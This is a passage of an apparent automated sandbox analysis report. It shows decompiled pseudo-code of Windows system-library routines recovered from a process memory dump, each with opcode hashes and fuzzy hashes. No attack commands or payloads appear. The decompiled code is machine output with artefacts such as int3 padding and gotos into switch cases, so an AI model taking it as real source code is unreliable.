                                                              						_v32 = 0;
                                                              						_v28 =  &_v164;
                                                              						_v24 = 0;
                                                              						_v20 = _t70;
                                                              						_v16 = 0;
                                                              						_t69 = 0xfcbc46;
                                                              						_t48 = E01067B9C(0x10d53e8, 0xfcbc46, _t67, 0x10d53e8, _t70,  &_v140);
                                                              					}
                                                              				}
                                                              				return E0102B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1f8c8817ebae0198008c75c4a2e5ca1b16e7ccfbc648f08bc33bf8c8410481b6
                                                              • Instruction ID: 411f9079fa94d050baa50be2f7cd7fc1b8a1797e34a2a94c90e50fdb9a67ed53
                                                              • Opcode Fuzzy Hash: 1f8c8817ebae0198008c75c4a2e5ca1b16e7ccfbc648f08bc33bf8c8410481b6
                                                              • Instruction Fuzzy Hash: 6A4181B5D003289FDB60CFAAD981AADFBF4FB48710F5081AEE559A7240DB745A44CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 74%
                                                              			E0101E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                              				intOrPtr* _v0;
                                                              				signed char _v4;
                                                              				signed int _v8;
                                                              				void* __ecx;
                                                              				void* __ebp;
                                                              				void* _t37;
                                                              				intOrPtr _t38;
                                                              				signed int _t44;
                                                              				signed char _t52;
                                                              				void* _t54;
                                                              				intOrPtr* _t56;
                                                              				void* _t58;
                                                              				char* _t59;
                                                              				signed int _t62;
                                                              
                                                              				_t58 = __edx;
                                                              				_push(0);
                                                              				_push(4);
                                                              				_push( &_v8);
                                                              				_push(0x24);
                                                              				_push(0xffffffff);
                                                              				if(E01029670() < 0) {
                                                              					L0103DF30(_t54, _t58, _t35);
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					asm("int3");
                                                              					_push(_t54);
                                                              					_t52 = _v4;
                                                              					if(_t52 > 8) {
                                                              						_t37 = 0xc0000078;
                                                              					} else {
                                                              						_t38 =  *0x10d7b9c; // 0x0
                                                              						_t62 = _t52 & 0x000000ff;
                                                              						_t59 = L01004620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                              						if(_t59 == 0) {
                                                              							_t37 = 0xc0000017;
                                                              						} else {
                                                              							_t56 = _v0;
                                                              							 *(_t59 + 1) = _t52;
                                                              							 *_t59 = 1;
                                                              							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                              							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                              							_t44 = _t62 - 1;
                                                              							if(_t44 <= 7) {
                                                              								switch( *((intOrPtr*)(_t44 * 4 +  &M0101E810))) {
                                                              									case 0:
                                                              										L6:
                                                              										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                              										goto L7;
                                                              									case 1:
                                                              										L13:
                                                              										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                              										goto L6;
                                                              									case 2:
                                                              										L12:
                                                              										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                              										goto L13;
                                                              									case 3:
                                                              										L11:
                                                              										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                              										goto L12;
                                                              									case 4:
                                                              										L10:
                                                              										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                              										goto L11;
                                                              									case 5:
                                                              										L9:
                                                              										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                              										goto L10;
                                                              									case 6:
                                                              										L17:
                                                              										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                              										goto L9;
                                                              									case 7:
                                                              										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                              										goto L17;
                                                              								}
                                                              							}
                                                              							L7:
                                                              							 *_a40 = _t59;
                                                              							_t37 = 0;
                                                              						}
                                                              					}
                                                              					return _t37;
                                                              				} else {
                                                              					_push(0x20);
                                                              					asm("ror eax, cl");
                                                              					return _a4 ^ _v8;
                                                              				}
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2880d331e45a209c1b7b39dbe5fc474e3e6c7345b2973bbf480567edfda0c19a
                                                              • Instruction ID: fbe891eeb2e53ec7d0e1b26fec1f1952a46ef78f3677334fe9f39b53717e013a
                                                              • Opcode Fuzzy Hash: 2880d331e45a209c1b7b39dbe5fc474e3e6c7345b2973bbf480567edfda0c19a
                                                              • Instruction Fuzzy Hash: 20318D75A14249EFE745CF58C841B9ABBE8FB08314F148296FE48CB341D635EC80CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E0101BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v12;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				intOrPtr _t22;
                                                              				intOrPtr* _t41;
                                                              				intOrPtr _t51;
                                                              
                                                              				_t51 =  *0x10d6100; // 0x5
                                                              				_v12 = __edx;
                                                              				_v8 = __ecx;
                                                              				if(_t51 >= 0x800) {
                                                              					L12:
                                                              					return 0;
                                                              				} else {
                                                              					goto L1;
                                                              				}
                                                              				while(1) {
                                                              					L1:
                                                              					_t22 = _t51;
                                                              					asm("lock cmpxchg [ecx], edx");
                                                              					if(_t51 == _t22) {
                                                              						break;
                                                              					}
                                                              					_t51 = _t22;
                                                              					if(_t22 < 0x800) {
                                                              						continue;
                                                              					}
                                                              					goto L12;
                                                              				}
                                                              				E01002280(0xd, 0x542f1a0);
                                                              				_t41 =  *0x10d60f8; // 0x0
                                                              				if(_t41 != 0) {
                                                              					 *0x10d60f8 =  *_t41;
                                                              					 *0x10d60fc =  *0x10d60fc + 0xffff;
                                                              				}
                                                              				E00FFFFB0(_t41, 0x800, 0x542f1a0);
                                                              				if(_t41 != 0) {
                                                              					L6:
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                              					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                              					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                              					do {
                                                              						asm("lock xadd [0x10d60f0], ax");
                                                              						 *((short*)(_t41 + 0x34)) = 1;
                                                              					} while (1 == 0);
                                                              					goto L8;
                                                              				} else {
                                                              					_t41 = L01004620(0x10d6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                              					if(_t41 == 0) {
                                                              						L11:
                                                              						asm("lock dec dword [0x10d6100]");
                                                              						L8:
                                                              						return _t41;
                                                              					}
                                                              					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                              					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                              					if(_t41 == 0) {
                                                              						goto L11;
                                                              					}
                                                              					goto L6;
                                                              				}
                                                              			}











                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f8073c7219a20e40c80bccd5fec46a64343046bcf4d2b3db4c42a0e9d4661327
                                                              • Instruction ID: 999d4bf39628df261a88da7340761d2a6f484b97a352721d3d05bcbe60c53f70
                                                              • Opcode Fuzzy Hash: f8073c7219a20e40c80bccd5fec46a64343046bcf4d2b3db4c42a0e9d4661327
                                                              • Instruction Fuzzy Hash: 463136366016069FCB61EF98C4807A677B4FF18310F4400B4EDC4DB209EB7AD945CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 60%
                                                              			E01011DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                              				char _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr* _v20;
                                                              				void* _t22;
                                                              				char _t23;
                                                              				void* _t36;
                                                              				intOrPtr _t42;
                                                              				intOrPtr _t43;
                                                              
                                                              				_v12 = __ecx;
                                                              				_t43 = 0;
                                                              				_v20 = __edx;
                                                              				_t42 =  *__edx;
                                                              				 *__edx = 0;
                                                              				_v16 = _t42;
                                                              				_push( &_v8);
                                                              				_push(0);
                                                              				_push(0);
                                                              				_push(6);
                                                              				_push(0);
                                                              				_push(__ecx);
                                                              				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                                              				_push(_t36);
                                                              				_t22 = E0100F460();
                                                              				if(_t22 < 0) {
                                                              					if(_t22 == 0xc0000023) {
                                                              						goto L1;
                                                              					}
                                                              					L3:
                                                              					return _t43;
                                                              				}
                                                              				L1:
                                                              				_t23 = _v8;
                                                              				if(_t23 != 0) {
                                                              					_t38 = _a4;
                                                              					if(_t23 >  *_a4) {
                                                              						_t42 = L01004620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                                              						if(_t42 == 0) {
                                                              							goto L3;
                                                              						}
                                                              						_t23 = _v8;
                                                              					}
                                                              					_push( &_v8);
                                                              					_push(_t23);
                                                              					_push(_t42);
                                                              					_push(6);
                                                              					_push(_t43);
                                                              					_push(_v12);
                                                              					_push(_t36);
                                                              					if(E0100F460() < 0) {
                                                              						if(_t42 != 0 && _t42 != _v16) {
                                                              							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                                              						}
                                                              						goto L3;
                                                              					}
                                                              					 *_v20 = _t42;
                                                              					 *_a4 = _v8;
                                                              				}
                                                              				_t43 = 1;
                                                              				goto L3;
                                                              			}













                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                              • Instruction ID: 4e77acde7242ef153d09efd109973bc938e63eabe76aa94a38496db8669a26e1
                                                              • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                              • Instruction Fuzzy Hash: 73217F72600119FBD725CFA9CC80EABBBFDEF89780F154195FA8597250D678AE01C7A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E00FE9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                              				signed int _t53;
                                                              				signed int _t56;
                                                              				signed int* _t60;
                                                              				signed int _t63;
                                                              				signed int _t66;
                                                              				signed int _t69;
                                                              				void* _t70;
                                                              				intOrPtr* _t72;
                                                              				void* _t78;
                                                              				void* _t79;
                                                              				signed int _t80;
                                                              				intOrPtr _t82;
                                                              				void* _t85;
                                                              				void* _t88;
                                                              				void* _t89;
                                                              
                                                              				_t84 = __esi;
                                                              				_t70 = __ecx;
                                                              				_t68 = __ebx;
                                                              				_push(0x2c);
                                                              				_push(0x10bf6e8);
                                                              				E0103D0E8(__ebx, __edi, __esi);
                                                              				 *((char*)(_t85 - 0x1d)) = 0;
                                                              				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                              				if(_t82 == 0) {
                                                              					L4:
                                                              					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                              						E010B88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                              					}
                                                              					L5:
                                                              					return E0103D130(_t68, _t82, _t84);
                                                              				}
                                                              				_t88 = _t82 -  *0x10d86c0; // 0xb807b0
                                                              				if(_t88 == 0) {
                                                              					goto L4;
                                                              				}
                                                              				_t89 = _t82 -  *0x10d86b8; // 0x0
                                                              				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                              					goto L4;
                                                              				} else {
                                                              					E01002280(_t82 + 0xe0, _t82 + 0xe0);
                                                              					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                              					__eflags =  *((char*)(_t82 + 0xe5));
                                                              					if(__eflags != 0) {
                                                              						E010B88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                              						goto L12;
                                                              					} else {
                                                              						__eflags =  *((char*)(_t82 + 0xe4));
                                                              						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                              							 *((char*)(_t82 + 0xe4)) = 1;
                                                              							_push(_t82);
                                                              							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                              							E0102AFD0();
                                                              						}
                                                              						while(1) {
                                                              							_t60 = _t82 + 8;
                                                              							 *(_t85 - 0x2c) = _t60;
                                                              							_t68 =  *_t60;
                                                              							_t80 = _t60[1];
                                                              							 *(_t85 - 0x28) = _t68;
                                                              							 *(_t85 - 0x24) = _t80;
                                                              							while(1) {
                                                              								L10:
                                                              								__eflags = _t80;
                                                              								if(_t80 == 0) {
                                                              									break;
                                                              								}
                                                              								_t84 = _t68;
                                                              								 *(_t85 - 0x30) = _t80;
                                                              								 *(_t85 - 0x24) = _t80 - 1;
                                                              								asm("lock cmpxchg8b [edi]");
                                                              								_t68 = _t84;
                                                              								 *(_t85 - 0x28) = _t68;
                                                              								 *(_t85 - 0x24) = _t80;
                                                              								__eflags = _t68 - _t84;
                                                              								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                              								if(_t68 != _t84) {
                                                              									continue;
                                                              								}
                                                              								__eflags = _t80 -  *(_t85 - 0x30);
                                                              								if(_t80 !=  *(_t85 - 0x30)) {
                                                              									continue;
                                                              								}
                                                              								__eflags = _t80;
                                                              								if(_t80 == 0) {
                                                              									break;
                                                              								}
                                                              								_t63 = 0;
                                                              								 *(_t85 - 0x34) = 0;
                                                              								_t84 = 0;
                                                              								__eflags = 0;
                                                              								while(1) {
                                                              									 *(_t85 - 0x3c) = _t84;
                                                              									__eflags = _t84 - 3;
                                                              									if(_t84 >= 3) {
                                                              										break;
                                                              									}
                                                              									__eflags = _t63;
                                                              									if(_t63 != 0) {
                                                              										L40:
                                                              										_t84 =  *_t63;
                                                              										__eflags = _t84;
                                                              										if(_t84 != 0) {
                                                              											_t84 =  *(_t84 + 4);
                                                              											__eflags = _t84;
                                                              											if(_t84 != 0) {
                                                              												 *0x10db1e0(_t63, _t82);
                                                              												 *_t84();
                                                              											}
                                                              										}
                                                              										do {
                                                              											_t60 = _t82 + 8;
                                                              											 *(_t85 - 0x2c) = _t60;
                                                              											_t68 =  *_t60;
                                                              											_t80 = _t60[1];
                                                              											 *(_t85 - 0x28) = _t68;
                                                              											 *(_t85 - 0x24) = _t80;
                                                              											goto L10;
                                                              										} while (_t63 == 0);
                                                              										goto L40;
                                                              									}
                                                              									_t69 = 0;
                                                              									__eflags = 0;
                                                              									while(1) {
                                                              										 *(_t85 - 0x38) = _t69;
                                                              										__eflags = _t69 -  *0x10d84c0;
                                                              										if(_t69 >=  *0x10d84c0) {
                                                              											break;
                                                              										}
                                                              										__eflags = _t63;
                                                              										if(_t63 != 0) {
                                                              											break;
                                                              										}
                                                              										_t66 = E010B9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                              										__eflags = _t66;
                                                              										if(_t66 == 0) {
                                                              											_t63 = 0;
                                                              											__eflags = 0;
                                                              										} else {
                                                              											_t63 = _t66 + 0xfffffff4;
                                                              										}
                                                              										 *(_t85 - 0x34) = _t63;
                                                              										_t69 = _t69 + 1;
                                                              									}
                                                              									_t84 = _t84 + 1;
                                                              								}
                                                              								__eflags = _t63;
                                                              							}
                                                              							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                              							 *((char*)(_t82 + 0xe5)) = 1;
                                                              							 *((char*)(_t85 - 0x1d)) = 1;
                                                              							L12:
                                                              							 *(_t85 - 4) = 0xfffffffe;
                                                              							E00FE922A(_t82);
                                                              							_t53 = E01007D50();
                                                              							__eflags = _t53;
                                                              							if(_t53 != 0) {
                                                              								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              							} else {
                                                              								_t56 = 0x7ffe0386;
                                                              							}
                                                              							__eflags =  *_t56;
                                                              							if( *_t56 != 0) {
                                                              								_t56 = E010B8B58(_t82);
                                                              							}
                                                              							__eflags =  *((char*)(_t85 - 0x1d));
                                                              							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                              								__eflags = _t82 -  *0x10d86c0; // 0xb807b0
                                                              								if(__eflags != 0) {
                                                              									__eflags = _t82 -  *0x10d86b8; // 0x0
                                                              									if(__eflags == 0) {
                                                              										_t79 = 0x10d86bc;
                                                              										_t72 = 0x10d86b8;
                                                              										goto L18;
                                                              									}
                                                              									__eflags = _t56 | 0xffffffff;
                                                              									asm("lock xadd [edi], eax");
                                                              									if(__eflags == 0) {
                                                              										E00FE9240(_t68, _t82, _t82, _t84, __eflags);
                                                              									}
                                                              								} else {
                                                              									_t79 = 0x10d86c4;
                                                              									_t72 = 0x10d86c0;
                                                              									L18:
                                                              									E01019B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                              								}
                                                              							}
                                                              							goto L5;
                                                              						}
                                                              					}
                                                              				}
                                                              			}



















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 73501dff25212a2a4f6b19111affb3a65ce4fa784cbfc3885b872af6763df352
                                                              • Instruction ID: 0b503e9481414e24a099ee21be2601029d10e59c009f9ce7c14cd415f82521a9
                                                              • Opcode Fuzzy Hash: 73501dff25212a2a4f6b19111affb3a65ce4fa784cbfc3885b872af6763df352
                                                              • Instruction Fuzzy Hash: AB310675E092C6DFDB21DF6AC488BDCBBF1BB58360F24815AC48467251C3B8A980DB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 53%
                                                              			E01000050(void* __ecx) {
                                                              				signed int _v8;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				intOrPtr* _t30;
                                                              				intOrPtr* _t31;
                                                              				signed int _t34;
                                                              				void* _t40;
                                                              				void* _t41;
                                                              				signed int _t44;
                                                              				intOrPtr _t47;
                                                              				signed int _t58;
                                                              				void* _t59;
                                                              				void* _t61;
                                                              				void* _t62;
                                                              				signed int _t64;
                                                              
                                                              				_push(__ecx);
                                                              				_v8 =  *0x10dd360 ^ _t64;
                                                              				_t61 = __ecx;
                                                              				_t2 = _t61 + 0x20; // 0x20
                                                              				E01019ED0(_t2, 1, 0);
                                                              				_t52 =  *(_t61 + 0x8c);
                                                              				_t4 = _t61 + 0x8c; // 0x8c
                                                              				_t40 = _t4;
                                                              				do {
                                                              					_t44 = _t52;
                                                              					_t58 = _t52 & 0x00000001;
                                                              					_t24 = _t44;
                                                              					asm("lock cmpxchg [ebx], edx");
                                                              					_t52 = _t44;
                                                              				} while (_t52 != _t44);
                                                              				if(_t58 == 0) {
                                                              					L7:
                                                              					_pop(_t59);
                                                              					_pop(_t62);
                                                              					_pop(_t41);
                                                              					return E0102B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                              				}
                                                              				asm("lock xadd [esi], eax");
                                                              				_t47 =  *[fs:0x18];
                                                              				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                              				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                              				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                              				if(_t30 != 0) {
                                                              					if( *_t30 == 0) {
                                                              						goto L4;
                                                              					}
                                                              					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              					L5:
                                                              					if( *_t31 != 0) {
                                                              						_t18 = _t61 + 0x78; // 0x78
                                                              						E010B8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                              					}
                                                              					_t52 =  *(_t61 + 0x5c);
                                                              					_t11 = _t61 + 0x78; // 0x78
                                                              					_t34 = E01019702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                              					_t24 = _t34 | 0xffffffff;
                                                              					asm("lock xadd [esi], eax");
                                                              					if((_t34 | 0xffffffff) == 0) {
                                                              						 *0x10db1e0(_t61);
                                                              						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                              					}
                                                              					goto L7;
                                                              				}
                                                              				L4:
                                                              				_t31 = 0x7ffe0386;
                                                              				goto L5;
                                                              			}





















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 412852cbc92a099c002dc26df0ae9a0072c7e9a597c1568a5171512d5d89a40d
                                                              • Instruction ID: 212826dd4dc4c77e1ee6c9a28cdff24941c49ad306a5a77f0aa7fbf32237ff24
                                                              • Opcode Fuzzy Hash: 412852cbc92a099c002dc26df0ae9a0072c7e9a597c1568a5171512d5d89a40d
                                                              • Instruction Fuzzy Hash: 9631BF31201B05CFE762CF28C840B9AB7E5FF89754F1485ADF5D687A94EB35A801CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 77%
                                                              			E01066C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                                              				signed short* _v8;
                                                              				signed char _v12;
                                                              				void* _t22;
                                                              				signed char* _t23;
                                                              				intOrPtr _t24;
                                                              				signed short* _t44;
                                                              				void* _t47;
                                                              				signed char* _t56;
                                                              				signed char* _t58;
                                                              
                                                              				_t48 = __ecx;
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t44 = __ecx;
                                                              				_v12 = __edx;
                                                              				_v8 = __ecx;
                                                              				_t22 = E01007D50();
                                                              				_t58 = 0x7ffe0384;
                                                              				if(_t22 == 0) {
                                                              					_t23 = 0x7ffe0384;
                                                              				} else {
                                                              					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              				}
                                                              				if( *_t23 != 0) {
                                                              					_t24 =  *0x10d7b9c; // 0x0
                                                              					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                                              					_t23 = L01004620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                                              					_t56 = _t23;
                                                              					if(_t56 != 0) {
                                                              						_t56[0x24] = _a4;
                                                              						_t56[0x28] = _a8;
                                                              						_t56[6] = 0x1420;
                                                              						_t56[0x20] = _v12;
                                                              						_t14 =  &(_t56[0x2c]); // 0x2c
                                                              						E0102F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                                              						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                                              						if(E01007D50() != 0) {
                                                              							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              						}
                                                              						_push(_t56);
                                                              						_push(_t47 - 0x20);
                                                              						_push(0x402);
                                                              						_push( *_t58 & 0x000000ff);
                                                              						E01029AE0();
                                                              						_t23 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                                              					}
                                                              				}
                                                              				return _t23;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55544ebfcbbef7804f5b8a1f0f0dec431d037333ea1313562b4b73a2693f0444
                                                              • Instruction ID: 749b24c612b3efe900e80037cfa1d97f10e25a0aba8fd16983dc77fbbbe67d59
                                                              • Opcode Fuzzy Hash: 55544ebfcbbef7804f5b8a1f0f0dec431d037333ea1313562b4b73a2693f0444
                                                              • Instruction Fuzzy Hash: 7E21AD71A00A55AFD711DB68D840F6AB7B8FF48750F0440AAF988D7791D639ED10CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 82%
                                                              			E010290AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                              				intOrPtr* _v0;
                                                              				void* _v8;
                                                              				signed int _v12;
                                                              				intOrPtr _v16;
                                                              				char _v36;
                                                              				void* _t38;
                                                              				intOrPtr _t41;
                                                              				void* _t44;
                                                              				signed int _t45;
                                                              				intOrPtr* _t49;
                                                              				signed int _t57;
                                                              				signed int _t58;
                                                              				intOrPtr* _t59;
                                                              				void* _t62;
                                                              				void* _t63;
                                                              				void* _t65;
                                                              				void* _t66;
                                                              				signed int _t69;
                                                              				intOrPtr* _t70;
                                                              				void* _t71;
                                                              				intOrPtr* _t72;
                                                              				intOrPtr* _t73;
                                                              				char _t74;
                                                              
                                                              				_t65 = __edx;
                                                              				_t57 = _a4;
                                                              				_t32 = __ecx;
                                                              				_v8 = __edx;
                                                              				_t3 = _t32 + 0x14c; // 0x14c
                                                              				_t70 = _t3;
                                                              				_v16 = __ecx;
                                                              				_t72 =  *_t70;
                                                              				while(_t72 != _t70) {
                                                              					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                              						L24:
                                                              						_t72 =  *_t72;
                                                              						continue;
                                                              					}
                                                              					_t30 = _t72 + 0x10; // 0x10
                                                              					if(E0103D4F0(_t30, _t65, _t57) == _t57) {
                                                              						return 0xb7;
                                                              					}
                                                              					_t65 = _v8;
                                                              					goto L24;
                                                              				}
                                                              				_t61 = _t57;
                                                              				_push( &_v12);
                                                              				_t66 = 0x10;
                                                              				if(E0101E5E0(_t57, _t66) < 0) {
                                                              					return 0x216;
                                                              				}
                                                              				_t73 = L01004620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                              				if(_t73 == 0) {
                                                              					_t38 = 0xe;
                                                              					return _t38;
                                                              				}
                                                              				_t9 = _t73 + 0x10; // 0x10
                                                              				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                              				E0102F3E0(_t9, _v8, _t57);
                                                              				_t41 =  *_t70;
                                                              				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                              					_t62 = 3;
                                                              					asm("int 0x29");
                                                              					_push(_t62);
                                                              					_push(_t57);
                                                              					_push(_t73);
                                                              					_push(_t70);
                                                              					_t71 = _t62;
                                                              					_t74 = 0;
                                                              					_v36 = 0;
                                                              					_t63 = E0101A2F0(_t62, _t71, 1, 6,  &_v36);
                                                              					if(_t63 == 0) {
                                                              						L20:
                                                              						_t44 = 0x57;
                                                              						return _t44;
                                                              					}
                                                              					_t45 = _v12;
                                                              					_t58 = 0x1c;
                                                              					if(_t45 < _t58) {
                                                              						goto L20;
                                                              					}
                                                              					_t69 = _t45 / _t58;
                                                              					if(_t69 == 0) {
                                                              						L19:
                                                              						return 0xe8;
                                                              					}
                                                              					_t59 = _v0;
                                                              					do {
                                                              						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                              							goto L18;
                                                              						}
                                                              						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                              						 *_t59 = _t49;
                                                              						if( *_t49 != 0x53445352) {
                                                              							goto L18;
                                                              						}
                                                              						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                              						return 0;
                                                              						L18:
                                                              						_t63 = _t63 + 0x1c;
                                                              						_t74 = _t74 + 1;
                                                              					} while (_t74 < _t69);
                                                              					goto L19;
                                                              				}
                                                              				 *_t73 = _t41;
                                                              				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                              				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                              				 *_t70 = _t73;
                                                              				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                              				return 0;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                              • Instruction ID: f4cd4b8540169b2fe0eff5e3650ca703866479354e0424c57c72f7d76a0ef6af
                                                              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                              • Instruction Fuzzy Hash: A6219F71A00325EFDB21DF59C844EAAFBF8EF54354F1488AAE989A7200D730ED00CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

